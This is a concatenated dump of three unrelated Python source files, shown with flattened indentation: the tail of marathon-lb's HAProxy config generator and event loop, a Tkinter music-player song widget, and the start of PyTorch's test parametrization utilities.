draining)
# Convert into a list for easier consumption
apps_list = []
for marathon_app in marathon_apps:
for service in list(marathon_app.services.values()):
if service.backends:
apps_list.append(service)
return apps_list
def regenerate_config(marathon, config_file, groups, bind_http_https,
ssl_certs, templater, haproxy_map, group_https_by_vhost):
domain_map_array = []
app_map_array = []
raw_apps = marathon.list()
apps = get_apps(marathon, raw_apps)
generated_config = config(apps, groups, bind_http_https, ssl_certs,
templater, haproxy_map, domain_map_array,
app_map_array, config_file, group_https_by_vhost)
(changed, config_valid) = compareWriteAndReloadConfig(
generated_config, config_file, domain_map_array, app_map_array,
haproxy_map)
if changed and not config_valid and not args.skip_config_cleanup:
apps = make_config_valid_and_regenerate(marathon,
raw_apps,
groups,
bind_http_https,
ssl_certs,
templater,
haproxy_map,
domain_map_array,
app_map_array,
config_file,
group_https_by_vhost)
return apps
# Build up a valid configuration by adding one app at a time and checking
# for valid config file after each app
def make_config_valid_and_regenerate(marathon,
raw_apps,
groups,
bind_http_https,
ssl_certs,
templater,
haproxy_map,
domain_map_array,
app_map_array,
config_file,
group_https_by_vhost):
try:
start_time = time.time()
apps = []
valid_apps = []
excluded_ids = []
included_ids = []
for app in raw_apps:
domain_map_array = []
app_map_array = []
valid_apps.append(app)
apps = get_apps(marathon, valid_apps)
generated_config = config(apps, groups, bind_http_https,
ssl_certs, templater, haproxy_map,
domain_map_array, app_map_array,
config_file, group_https_by_vhost)
config_valid = generateAndValidateTempConfig(generated_config,
config_file,
domain_map_array,
app_map_array,
haproxy_map)
if not config_valid:
                logger.warning(
"invalid configuration caused by app %s; "
"it will be excluded", app["id"])
del valid_apps[-1]
excluded_ids.append(app["id"])
else:
included_ids.append(app["id"])
if len(valid_apps) > 0:
logger.debug("reloading valid config including apps: %s, and "
"excluding apps: %s", included_ids, excluded_ids)
domain_map_array = []
app_map_array = []
apps = get_apps(marathon, valid_apps)
valid_config = config(apps, groups, bind_http_https,
ssl_certs, templater, haproxy_map,
domain_map_array, app_map_array,
config_file, group_https_by_vhost)
compareWriteAndReloadConfig(valid_config,
config_file,
domain_map_array,
app_map_array, haproxy_map)
else:
logger.error("A valid config file could not be generated after "
"excluding all apps! skipping reload")
logger.debug("reloading while excluding invalid tasks finished, "
"took %s seconds",
time.time() - start_time)
return apps
except Exception:
logger.exception("Unexpected error!")
class MarathonEventProcessor(object):
def __init__(self, marathon,
config_file,
groups,
bind_http_https,
ssl_certs,
haproxy_map,
group_https_by_vhost):
self.__marathon = marathon
# appId -> MarathonApp
self.__apps = dict()
self.__config_file = config_file
self.__groups = groups
self.__templater = ConfigTemplater()
self.__bind_http_https = bind_http_https
self.__group_https_by_vhost = group_https_by_vhost
self.__ssl_certs = ssl_certs
self.__condition = threading.Condition()
self.__pending_reset = False
self.__pending_reload = False
self.__haproxy_map = haproxy_map
self.relevant_events = ('api_post_event',
'health_status_changed_event',
'status_update_event')
self.__thread = None
# Fetch the base data
self.reset_from_tasks()
def start(self):
self.__stop = False
if self.__thread is not None and self.__thread.is_alive():
self.reset_from_tasks()
return
self.__thread = threading.Thread(target=self.try_reset)
self.__thread.start()
def try_reset(self):
with self.__condition:
logger.info('({}): starting event processor thread'.format(
threading.get_ident()))
while True:
self.__condition.acquire()
if self.__stop:
logger.info('({}): stopping event processor thread'.format(
threading.get_ident()))
self.__condition.release()
return
if not self.__pending_reset and not self.__pending_reload:
if not self.__condition.wait(300):
logger.info('({}): condition wait expired'.format(
threading.get_ident()))
pending_reset = self.__pending_reset
pending_reload = self.__pending_reload
self.__pending_reset = False
self.__pending_reload = False
self.__condition.release()
# Reset takes precedence over reload
if pending_reset:
self.do_reset()
elif pending_reload:
self.do_reload()
else:
# Timed out waiting on the condition variable, just do a
# full reset for good measure (as was done before).
self.do_reset()
def do_reset(self):
try:
start_time = time.time()
self.__apps = regenerate_config(self.__marathon,
self.__config_file,
self.__groups,
self.__bind_http_https,
self.__ssl_certs,
self.__templater,
self.__haproxy_map,
self.__group_https_by_vhost)
logger.debug("({0}): updating tasks finished, "
"took {1} seconds".format(
threading.get_ident(),
time.time() - start_time))
except requests.exceptions.ConnectionError as e:
logger.error(
"({0}): Connection error({1}): {2}. Marathon is {3}".format(
threading.get_ident(), e.errno, e.strerror,
self.__marathon.current_host))
except Exception:
logger.exception("Unexpected error!. Marathon is {0}".format(
self.__marathon.current_host))
def do_reload(self):
try:
# Validate the existing config before reloading
logger.debug("({}): attempting to reload existing "
"config...".format(
threading.get_ident()))
if validateConfig(self.__config_file):
reloadConfig()
except Exception:
logger.exception("Unexpected error!")
def stop(self):
self.__condition.acquire()
self.__stop = True
self.__condition.notify()
self.__condition.release()
def reset_from_tasks(self):
self.__condition.acquire()
self.__pending_reset = True
self.__condition.notify()
self.__condition.release()
def reload_existing_config(self):
self.__condition.acquire()
self.__pending_reload = True
self.__condition.notify()
self.__condition.release()
def handle_event(self, event):
if event['eventType'] in self.relevant_events:
self.reset_from_tasks()
def handle_signal(self, sig, stack):
if sig == signal.SIGHUP:
logger.debug('received signal SIGHUP - reloading config')
self.reset_from_tasks()
elif sig == signal.SIGUSR1:
logger.debug('received signal SIGUSR1 - reloading existing config')
self.reload_existing_config()
else:
logger.warning('received unknown signal %d' % (sig,))
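# Illustrative note (not part of marathon-lb itself): with the SSE event
# processor running and the signal handlers installed in __main__ below, an
# operator can trigger the two code paths above from a shell, e.g.
#
#   kill -HUP  <marathon-lb pid>   # full reset: re-fetch apps and regenerate
#   kill -USR1 <marathon-lb pid>   # re-validate and reload existing config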
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Marathon HAProxy Load Balancer",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--longhelp",
help="Print out configuration details",
action="store_true")
parser.add_argument("--marathon", "-m",
nargs="+",
help="[required] Marathon endpoint, eg. " +
"-m http://marathon1:8080 http://marathon2:8080",
default=["http://master.mesos:8080"])
parser.add_argument("--haproxy-config",
help="Location of haproxy configuration",
default="/etc/haproxy/haproxy.cfg")
parser.add_argument("--group",
help="[required] Only generate config for apps which"
" list the specified names. Use '*' to match all"
" groups, including those without a group specified.",
action="append",
default=list())
parser.add_argument("--command", "-c",
help="If set, run this command to reload haproxy.",
default=None)
parser.add_argument("--max-reload-retries",
help="Max reload retries before failure. Reloads"
" happen every --reload-interval seconds. Set to"
" 0 to disable or -1 for infinite retries.",
type=int, default=10)
parser.add_argument("--reload-interval",
help="Wait this number of seconds between"
" reload retries.",
type=int, default=10)
parser.add_argument("--strict-mode",
help="If set, backends are only advertised if"
" HAPROXY_{n}_ENABLED=true. Strict mode will be"
" enabled by default in a future release.",
action="store_true")
parser.add_argument("--sse", "-s",
help="Use Server Sent Events",
action="store_true")
parser.add_argument("--archive-versions",
help="Number of config versions to archive",
type=int, default=5)
parser.add_argument("--health-check", "-H",
help="If set, respect Marathon's health check "
"statuses before adding the app instance into "
"the backend pool.",
action="store_true")
parser.add_argument("--lru-cache-capacity",
help="LRU cache size (in number "
"of items). This should be at least as large as the "
"number of tasks exposed via marathon-lb.",
type=int, default=1000
)
parser.add_argument("--haproxy-map",
help="Use HAProxy maps for domain name to backend"
"mapping.", action="store_true")
parser.add_argument("--dont-bind-http-https",
help="Don't bind to HTTP and HTTPS frontends.",
action="store_true")
parser.add_argument("--group-https-by-vhost",
help="Group https frontends by vhost.",
action="store_true")
parser.add_argument("--ssl-certs",
help="List of SSL certificates separated by comma"
"for frontend marathon_https_in"
"Ex: /etc/ssl/site1.co.pem,/etc/ssl/site2.co.pem",
default="/etc/ssl/cert.pem")
parser.add_argument("--skip-validation",
help="Skip haproxy config file validation",
action="store_true")
parser.add_argument("--skip-config-cleanup",
help="If one app fails, don't try to make "
"configuration valid by removing apps one by one",
action="store_true")
parser.add_argument("--dry", "-d",
help="Only print configuration to console",
action="store_true")
parser.add_argument("--min-serv-port-ip-per-task",
help="Minimum port number to use when auto-assigning "
"service ports for IP-per-task applications",
type=int, default=10050)
parser.add_argument("--max-serv-port-ip-per-task",
help="Maximum port number to use when auto-assigning "
"service ports for IP-per-task applications",
type=int, default=10100)
parser.add_argument("--max-backoff",
help="Maximum backoff to limit backoff size ",
type=int, default=300)
parser = set_logging_args(parser)
parser = set_marathon_auth_args(parser)
return parser
def load_json(data_str):
return cleanup_json(json.loads(data_str))
if __name__ == '__main__':
# Process arguments
arg_parser = get_arg_parser()
args = arg_parser.parse_args()
# Print the long help text if flag is set
if args.longhelp:
print(__doc__)
print('```')
arg_parser.print_help()
print('```')
print(ConfigTemplater().get_descriptions())
sys.exit()
# otherwise make sure that a Marathon URL was specified
else:
if args.marathon is None:
arg_parser.error('argument --marathon/-m is required')
if bool(args.min_serv_port_ip_per_task) != \
bool(args.max_serv_port_ip_per_task):
arg_parser.error(
'either specify both --min-serv-port-ip-per-task '
'and --max-serv-port-ip-per-task or neither (set both to zero '
'to disable auto assignment)')
if args.min_serv_port_ip_per_task > args.max_serv_port_ip_per_task:
arg_parser.error(
'cannot set --min-serv-port-ip-per-task to a higher value '
'than --max-serv-port-ip-per-task')
if len(args.group) == 0:
            arg_parser.error('argument --group is required: please ' +
'specify at least one group name')
# Configure the service port assigner if min/max ports have been specified.
if args.min_serv_port_ip_per_task and args.max_serv_port_ip_per_task:
SERVICE_PORT_ASSIGNER.set_ports(args.min_serv_port_ip_per_task,
args.max_serv_port_ip_per_task)
# Set request retries
s = requests.Session()
a = requests.adapters.HTTPAdapter(max_retries=3)
s.mount('http://', a)
# Setup logging
setup_logging(logger, args.syslog_socket, args.log_format, args.log_level)
# initialize health check LRU cache
if args.health_check:
healthCheckResultCache = LRUCache(args.lru_cache_capacity)
ip_cache.set(LRUCache(args.lru_cache_capacity))
# Marathon API connector
marathon = Marathon(args.marathon,
args.health_check,
args.strict_mode,
get_marathon_auth_params(args),
args.marathon_ca_cert)
# If we're going to be handling events, set up the event processor and
# hook it up to the process signals.
if args.sse:
processor = MarathonEventProcessor(marathon,
args.haproxy_config,
args.group,
not args.dont_bind_http_https,
args.ssl_certs,
args.haproxy_map,
args.group_https_by_vhost)
signal.signal(signal.SIGHUP, processor.handle_signal)
signal.signal(signal.SIGUSR1, processor.handle_signal)
backoffFactor = 1.5
waitSeconds = 3
waitResetSeconds = 600
while True:
stream_started = time.time()
currentWaitSeconds = random.random() * waitSeconds
stream = marathon.get_event_stream(processor.relevant_events)
try:
# processor start is now idempotent and will start at
# most one thread
processor.start()
events = marathon.iter_events(stream)
for event in events:
if (event.data.strip() != ''):
# marathon sometimes sends more than one json per event
# e.g. {}\r\n{}\r\n\r\n
for real_event_data in re.split(r'\r\n', event.data):
data = load_json(real_event_data)
logger.info(
"received event of type {0}"
.format(data['eventType']))
processor.handle_event(data)
else:
logger.info("skipping empty message")
except pycurl.error as e:
errno, e_msg = e.args
# Error number 28:
# 'Operation too slow. Less than 1 bytes/sec transferred
# the last 300 seconds'
# This happens when there is no activity on the marathon
# event stream for the last 5 minutes. In this case we
# should immediately reconnect in case the connection to
# marathon died silently so that we miss as few events as
# possible.
if errno == 28:
m = 'Possible timeout detected: {}, reconnecting now...'
logger.info(m.format(e_msg))
currentWaitSeconds = 0
else:
logger.exception("Caught exception")
logger.error("Reconnecting in {}s...".format(
currentWaitSeconds))
except Exception:
logger.exception("Caught exception")
logger.error("Reconnecting in {}s...".format(
currentWaitSeconds))
# We must close the connection because we are calling
# get_event_stream on the next loop
stream.curl.close()
if currentWaitSeconds > 0:
# Increase the next waitSeconds by the backoff factor
waitSeconds = backoffFactor * waitSeconds
                # Don't sleep any longer than --max-backoff seconds
if waitSeconds > args.max_backoff:
waitSeconds = args.max_backoff
# Reset the backoff if it's been more than 10 minutes
if (time.time() - stream_started) > waitResetSeconds:
waitSeconds = 3
time.sleep(currentWaitSeconds)
processor.stop()
else:
# Generate base config
regenerate_config(marathon,
args.haproxy_config,
args.group,
not args.dont_bind_http_https,
args.ssl_certs,
ConfigTemplater(),
args.haproxy_map,
args.group_https_by_vhost)
|
draw_song.py
|
# -*- coding: utf-8 -*-
from Scripts.elements import *
from Scripts.song_manage import SongManage
from Scripts.music_storage import MusicStorage
class DrawSong(SongManage):
def __init__(self, canvas, y, song_num, info, lib):
self.canvas = canvas
self.y = y
self.lib = lib
self.song_num = song_num
self.song_data = info
self.song_bbox = None
self.song_coords = {}
# def __del__(self):
# pass
def del_class(self):
del self.y
del self.canvas
del self.song_num
del self.song_data
del self.song_bbox
def play_click(self):
if self.click_play:
self.click_play = 0
Main.PLAYER_SETTINGS["play"] = 0
self.play_button["image"] = MyImage.PLAY
Main.PLAYER.pause()
# update buttons #
Main.SONG_LINE.draw_music_line()
Main.MENU.update_buttons()
else:
self.click_play = 1
Main.PLAYER_SETTINGS["play"] = 1
self.play_button["image"] = MyImage.PAUSE
if self.song_data["song_id"] != Main.SONG_PLAY_NOW["song_id"]:
# update lists #
if Main.LIST_OF_PLAY != Main.LIST_OF_MUSIC:
Main.RANDOM_MUSIC_LIST = []
Main.LIST_OF_PLAY = Main.LIST_OF_MUSIC.copy()
Main.LIST_OF_PLAY["classes"] = list_of_songs_class.copy()
Main.PAST_SONG["past_lib"] = self.lib
Thread(target=self.update_music, daemon=True).start()
else:
Thread(target=Main.PLAYER.play, daemon=True).start() # play
# update buttons #
Main.SONG_LINE.draw_music_line()
Main.MENU.update_buttons()
# update window with more song info #
if Main.MORE_INFO_INTERFACE.num_of_wins:
Main.MORE_INFO_INTERFACE.song_info_draw(Main.PAST_SONG["class"].song_data, Main.MORE_INFO_INTERFACE.searched_data)
def add_click(self):
if self.click_add:
# Delete song #
self.click_add = 0
self.add_button["image"] = MyImage.ADD
MusicStorage.delete_song("database2.sqlite", self.song_data["song_id"])
else:
# Add song #
self.click_add = 1
self.add_button["image"] = MyImage.ADD_CLICK
MusicStorage.add_song("database2.sqlite", self.song_data)
def save_click(self):
if self.click_save:
# Delete song #
self.click_save = 0
self.save_button["image"] = MyImage.SAVE
MusicStorage.delete_song("database3.sqlite", self.song_data["song_id"])
MusicStorage.delete_song_file(self.song_data["song_id"])
else:
# Download song #
self.click_save = 1
self.save_button["image"] = MyImage.SAVE_CLICK
Thread(target=MusicStorage.download_music, args=(self.song_data["song_id"], self.song_data["url"])).start()
MusicStorage.add_song("database3.sqlite", self.song_data)
def more_click(self):
Main.MORE_INFO_INTERFACE.song_info_draw(self.song_data)
def draw_play_button(self, x_coord, button_color="background"):
self.click_play = 0
if Main.PLAYER_SETTINGS["play"] and Main.SONG_PLAY_NOW["song_id"] == self.song_data["song_id"]:
self.click_play = 1
self.play_button = Button(image=MyImage.PAUSE, command=lambda: self.play_click(), width=16, height=23, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
else:
self.play_button = Button(image=MyImage.PLAY, command=lambda: self.play_click(), width=16, height=23, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
self.play_button_draw = self.canvas.create_window(x_coord, self.y, anchor=W, window=self.play_button)
self.song_bbox = self.canvas.bbox(self.play_button_draw)
self.song_coords["play_button"] = self.canvas.bbox(self.play_button_draw)
def draw_add_button(self, x_coord, button_color="background"):
self.click_add = MusicStorage.check_song_in_db("database2.sqlite", self.song_data["song_id"])
if self.click_add:
self.add_button = Button(image=MyImage.ADD_CLICK, command=lambda: self.add_click(), width=17, height=17, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
else:
self.add_button = Button(image=MyImage.ADD, command=lambda: self.add_click(), width=17, height=17, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
self.add_button_draw = self.canvas.create_window(x_coord, self.y, anchor=W, window=self.add_button)
self.song_bbox = self.canvas.bbox(self.add_button_draw)
self.song_coords["add_button"] = self.canvas.bbox(self.add_button_draw)
def draw_save_button(self, x_coord, button_color="background"):
self.click_save = MusicStorage.check_song_in_db("database3.sqlite", self.song_data["song_id"])
if self.click_save:
self.save_button = Button(image=MyImage.SAVE_CLICK, command=lambda: self.save_click(), width=18, height=24, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
else:
self.save_button = Button(image=MyImage.SAVE, command=lambda: self.save_click(), width=18, height=24, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
self.save_button_draw = self.canvas.create_window(x_coord, self.y, anchor=W, window=self.save_button)
self.song_bbox = self.canvas.bbox(self.save_button_draw)
self.song_coords["save_button"] = self.canvas.bbox(self.save_button_draw)
def draw_more_button(self, x_coord, button_color="background"):
self.more_button_draw = self.canvas.create_window(x_coord, self.y+1, anchor=W, window=Button(image=MyImage.MORE_INFO, command=lambda: self.more_click(), width=12, height=16, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE))
self.song_bbox = self.canvas.bbox(self.more_button_draw)
self.song_coords["more_button"] = self.canvas.bbox(self.more_button_draw)
def draw_name(self, x_coord):
song_name = self.song_data["name"][:34]+'...' if len(self.song_data["name"]) > 34 else self.song_data["name"]
song_author = self.song_data["author"][:34]+'...' if len(self.song_data["author"]) > 34 else self.song_data["author"]
self.name_draw = self.canvas.create_text(x_coord, self.y, text=f"{song_name} - ", fill=themes[Main.SETTINGS.theme]["text_color"], font="Verdana 12", anchor=W)
self.author_draw = self.canvas.create_text(self.canvas.bbox(self.name_draw)[2], self.y, text=song_author, fill=themes[Main.SETTINGS.theme]["text_second_color"], font="Verdana 12", anchor=W)
self.song_bbox = self.canvas.bbox(self.author_draw)
self.song_coords["name"] = self.canvas.bbox(self.author_draw)
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List, TypeVar
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
from .composite_compliance import no_dispatch
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
NATIVE_DEVICES = ('cpu', 'cuda', 'meta')
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
    Under the hood, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
"""
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
fn.parametrize_fn = compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn)
else:
fn.parametrize_fn = self._parametrize_test
return fn
def compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn):
"""
Returns a parametrize_fn that parametrizes over the product of the parameters handled
    by the given parametrize_fns. Each given parametrize_fn should have the signature
f(test, generic_cls, device_cls).
The test names will be a combination of the names produced by the parametrize_fns in
"<new_name>_<old_name>" order. This order is done to match intuition for constructed names
when composing multiple decorators; the names will be built in top to bottom order when stacking
parametrization decorators.
Args:
old_parametrize_fn (callable) - First parametrize_fn to compose.
new_parametrize_fn (callable) - Second parametrize_fn to compose.
"""
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
redundant_params = set(old_param_kwargs.keys()).intersection(new_param_kwargs.keys())
if redundant_params:
raise RuntimeError('Parametrization over the same parameter by multiple parametrization '
'decorators is not supported. For test "{}", the following parameters '
'are handled multiple times: {}'.format(
test.__name__, redundant_params))
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
merged_test_name = '{}{}{}'.format(new_test_name,
'_' if old_test_name != '' and new_test_name != '' else '',
old_test_name)
yield (new_test, merged_test_name, full_param_kwargs)
return composite_fn
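# Illustrative sketch of the naming order described above (hypothetical test and parameters):
#
#   @parametrize("x", range(2))          # applied second ("new"): its name comes first
#   @parametrize("y", ['foo', 'bar'])    # applied first ("old"): its name comes second
#   def test_example(self, x, y):
#       ...
#
#   # Generated names read top to bottom, e.g. test_example_x_0_y_foo, test_example_x_1_y_bar.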
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
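# Illustrative sketch of the instantiation flow above; the class and test names are hypothetical:
#
#   class ExampleTests(TestCase):
#       @parametrize("flag", [False, True])
#       def test_feature(self, flag):
#           ...
#
#   instantiate_parametrized_tests(ExampleTests)
#   # ExampleTests now has test_feature_flag_False and test_feature_flag_True,
#   # and the generic test_feature has been removed from the class.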
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consist of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separated by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
test_name = self._get_subtest_name(values, explicit_name=maybe_name)
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
